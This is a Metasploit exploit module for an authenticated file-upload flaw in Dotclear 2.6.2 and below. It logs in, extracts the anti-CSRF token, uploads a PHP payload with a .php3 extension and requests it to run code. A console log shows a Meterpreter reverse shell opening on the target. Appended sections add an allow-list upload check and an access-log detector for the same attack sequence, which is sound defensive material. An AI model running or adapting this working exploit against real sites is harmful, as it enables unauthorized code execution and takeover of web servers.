This is a Metasploit module that exploits an authenticated arbitrary file upload vulnerability in Dotclear versions 2.6.2 and below.
##
# This module requires Metasploit: http://metasploit.com/download
##
 
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'dotclear Media Manager Authenticated Arbitrary File Upload',
      'Description'    => %q{
      The vulnerability exists because the filemanager::isFileExclude() method does not properly verify the extension of
      uploaded files. This method only checks whether the uploaded file name matches the "exclude_pattern" regular expression,
      which by default is set to "/\.php$/i". This can be exploited to execute arbitrary PHP code by uploading a file with
      multiple extensions or with another extension (such as .php5 or .phtml) that the web server may hand to the PHP
      interpreter. Successful exploitation of this vulnerability requires an account with permissions to manage media items.
      },
      'Author'         =>
        [
          'Egidio Romano' # discovery
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://seclists.org/fulldisclosure/2014/May/108']
        ],
      'Payload'            =>
        {
          'Space' => 10000, # just a big enough number to fit any PHP payload
          'DisableNops' => true
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'dotclear 2.6.2', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 21 2014'))
 
    register_options([
      OptString.new('USERNAME', [true, 'The username to authenticate with', 'username']),
      OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']),
      OptString.new('TARGETURI', [true, 'The full URI path to the instance', '/']),
    ], self.class)
  end
 
  def check
    # No version fingerprint is implemented for this target, so report Unknown
    # rather than returning nil from an empty method body.
    Exploit::CheckCode::Unknown
  end
 
  def exploit
    # Credentials for the Dotclear admin login form (admin/auth.php).
    post = {
      'user_id' => datastore['USERNAME'],
      'user_pwd' => datastore['PASSWORD']
    }
 
    print_status("Authenticating...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'admin', 'auth.php'),
      'method' => 'POST',
      'vars_post' => post
    })
 
 
    unless res && res.body
      fail_with(Failure::Unreachable, 'Server did not respond in an expected way')
    end

    # The session cookie issued after login is reused for every later request.
    cookie = res.headers['Set-Cookie']
 
    print_status("Getting xd_check...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'admin', 'media.php?popup=1'),
      'cookie' => cookie
    })
 
    unless res && res.body
      fail_with(Failure::Unreachable, 'Server did not respond in an expected way')
    end

    # The media manager form carries an anti-CSRF token (xd_check) that must be
    # echoed back with the upload; abort if the page did not contain it, which
    # usually means the login failed or the account lacks media permissions.
    res.body =~ /name="xd_check" value="(.*)"  \/><input type="hidden" name="d"/

    xd_check = $1
    fail_with(Failure::NoAccess, 'Could not find the xd_check token; check credentials and permissions') unless xd_check
 
    # Build the multipart/form-data body the media manager expects.
    data = Rex::MIME::Message.new
    filename = Rex::Text.rand_text_alpha(8)
 
    data.add_part('2097152', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
    data.add_part(xd_check, nil, nil, 'form-data; name="xd_check"')
    data.add_part('', nil, nil, 'form-data; name="upfiletitle"')
    data.add_part('', nil, nil, 'form-data; name="d"')
    data.add_part('<?php ' + payload.encoded + ' ?>', nil, 'text/php', 'form-data; name="upfile[]"; filename="' + filename + '.php3')
 
    print_status("Sending payload...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'admin', 'media.php?pop_up=1&post_id='),
      'method' => 'POST',
      'cookie' => cookie,
      'data' => data.to_s,
      'ctype' => 'multipart/form-data; boundary=' + data.bound
    })
 
    unless res && res.body
      fail_with(Failure::Unreachable, 'Server did not respond in an expected way')
    end

    # The upload response is not parsed; success is confirmed by requesting the
    # uploaded file from the public media directory below.
 
    print_status("Popping shell...")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'public', filename + '.php3')
    })
  end
end
 
__END__
msf exploit(dotclear_file_upload) > show options
 
Module options (exploit/multi/http/dotclear_file_upload):
 
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   fdsafdsa         yes       The password to authenticate with
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.114    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /dotclear        yes       The full URI path to the instance
   USERNAME   fdsa             yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   dotclear 2.6.2
 
 
msf exploit(dotclear_file_upload) > exploit
 
[*] Started reverse handler on 192.168.1.31:4444
[*] Authenticating...
[*] Getting xd_check...
[*] Sending payload...
[*] Popping shell...
[*] Sending stage (39848 bytes) to 192.168.1.114
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.114:33825) at 2014-05-21 18:39:07 -0500
 
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:15:33 UTC 2013 i686
Meterpreter : php/php
meterpreter >
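The module's description above attributes the flaw to a deny-pattern check that only rejects names ending in ".php". The following Ruby example is added here and is not Dotclear's code nor part of the module: it reimplements that pattern check as the description states it (the `/\.php$/i` default) purely for comparison, and places next to it an allow-list check that inspects every extension segment of the name. The `SCRIPT_EXTENSIONS` and `ALLOWED_EXTENSIONS` lists are assumptions to be tuned per deployment.

```ruby
# Added example: weak deny-pattern check versus an allow-list extension check.
# Not part of Dotclear or of the Metasploit module above.

# The default pattern the module description cites: only a trailing ".php" is rejected.
DEFAULT_EXCLUDE_PATTERN = /\.php$/i

# Reimplementation of the pattern-only check, used here only for comparison
# (hypothetical; not the real filemanager::isFileExclude()).
def excluded_by_pattern?(filename, pattern = DEFAULT_EXCLUDE_PATTERN)
  filename =~ pattern ? true : false
end

# Extensions a web server might route to a PHP handler (assumed list).
SCRIPT_EXTENSIONS = %w[php php3 php4 php5 php7 phtml phar phps].freeze
# Extensions a media manager accepts (assumed list; keep it as short as the use case allows).
ALLOWED_EXTENSIONS = %w[jpg jpeg png gif webp pdf txt].freeze

# Hardened check: strip any directory part, refuse dotfiles, and require every
# dotted segment after the base name to be on the allow-list. Because each
# segment is examined, "shell.php.jpg" is rejected as well as "shell.phtml".
def upload_allowed?(filename)
  base = File.basename(filename.to_s)
  return false if base.empty? || base.start_with?('.')
  segments = base.split('.')
  return false if segments.length < 2          # no extension at all
  exts = segments.drop(1).map(&:downcase)
  return false if exts.any? { |e| SCRIPT_EXTENSIONS.include?(e) }
  exts.all? { |e| ALLOWED_EXTENSIONS.include?(e) }
end

# Side-by-side verdicts for a list of file names.
def compare(filenames)
  filenames.map do |f|
    { name: f, weak_rejects: excluded_by_pattern?(f), hardened_accepts: upload_allowed?(f) }
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample names covering the cases the description mentions.
  compare(%w[photo.jpg shell.php shell.php3 shell.phtml shell.php.jpg .htaccess]).each do |r|
    puts format('%-16s weak rejects: %-5s hardened accepts: %s',
                r[:name], r[:weak_rejects], r[:hardened_accepts])
  end
end
```

Running the script prints one line per name; the pattern check rejects only `shell.php`, while the allow-list check rejects every script-like or double-extension name and accepts only `photo.jpg`. The design point is that a deny-list has to anticipate every handler mapping the web server might have, whereas an allow-list only has to name what the feature legitimately needs.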
 
# DD0CF93049889DA5   1337day.com [2014-05-26]   8A24644AB4B17420 #
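The request sequence the module issues (login, a POST to admin/media.php, then a GET for the new file under public/) is visible in ordinary web-server access logs. The Ruby script below is an added example, not part of the module or of Dotclear: it parses combined-format log lines, remembers media-manager POSTs per client address, and raises an alert when the same client later fetches a file under /public/ whose name has a script-like or double extension. The log lines are constructed for the example, the five-minute window and the `SUSPICIOUS_NAME` pattern are assumptions, and the installation path `/dotclear` mirrors the TARGETURI shown in the session above.

```ruby
# Added example: correlate a media-manager upload with a later request for a
# script-like file under /public/. Not part of the module or of Dotclear.
require 'time'

# Combined log format; only the fields used here are captured.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Script-like extensions and double extensions (assumed list; tune to the server's handler map).
SUSPICIOUS_NAME = /\.(php\d?|phtml|phar)(\.|\z)/i

def parse_line(line)
  m = LOG_LINE.match(line)
  return nil unless m
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Returns one alert hash per suspicious GET; :after_upload is true when the same
# client POSTed to the media manager within `window` seconds beforehand.
def detect_upload_then_exec(lines, window: 300)
  uploads = Hash.new { |h, k| h[k] = [] }
  alerts = []
  lines.each do |line|
    e = parse_line(line)
    next unless e
    if e[:method] == 'POST' && e[:path] =~ %r{/admin/media\.php}
      uploads[e[:ip]] << e[:time]
    elsif e[:method] == 'GET' && e[:path] =~ %r{/public/[^/?]+}
      name = File.basename(e[:path].split('?').first)
      next unless name =~ SUSPICIOUS_NAME
      recent = uploads[e[:ip]].select { |t| (e[:time] - t).between?(0, window) }
      alerts << { ip: e[:ip], path: e[:path], status: e[:status],
                  after_upload: !recent.empty?,
                  severity: recent.empty? ? 'medium' : 'high' }
    end
  end
  alerts
end

# Constructed sample log: one client reproduces the module's sequence, another
# fetches an ordinary image.
SAMPLE_LOG = <<~LOG
  192.168.1.31 - - [21/May/2014:18:39:01 -0500] "POST /dotclear/admin/auth.php HTTP/1.1" 302 0
  192.168.1.31 - - [21/May/2014:18:39:02 -0500] "GET /dotclear/admin/media.php?popup=1 HTTP/1.1" 200 5120
  192.168.1.31 - - [21/May/2014:18:39:03 -0500] "POST /dotclear/admin/media.php?pop_up=1&post_id= HTTP/1.1" 200 312
  192.168.1.31 - - [21/May/2014:18:39:05 -0500] "GET /dotclear/public/kqjzndwe.php3 HTTP/1.1" 200 0
  10.0.0.7 - - [21/May/2014:18:40:00 -0500] "GET /dotclear/public/holiday.jpg HTTP/1.1" 200 84411
LOG

if __FILE__ == $PROGRAM_NAME
  detect_upload_then_exec(SAMPLE_LOG.lines).each do |a|
    puts "#{a[:severity].upcase}: #{a[:ip]} requested #{a[:path]} (HTTP #{a[:status]}, after upload: #{a[:after_upload]})"
  end
end
```

On the sample input the script emits a single high-severity alert for 192.168.1.31. A GET for a script-like name with no preceding upload still produces a medium alert, since such a file should not exist under the media directory at all; the status code is carried along so that a 200 can be ranked above a 404.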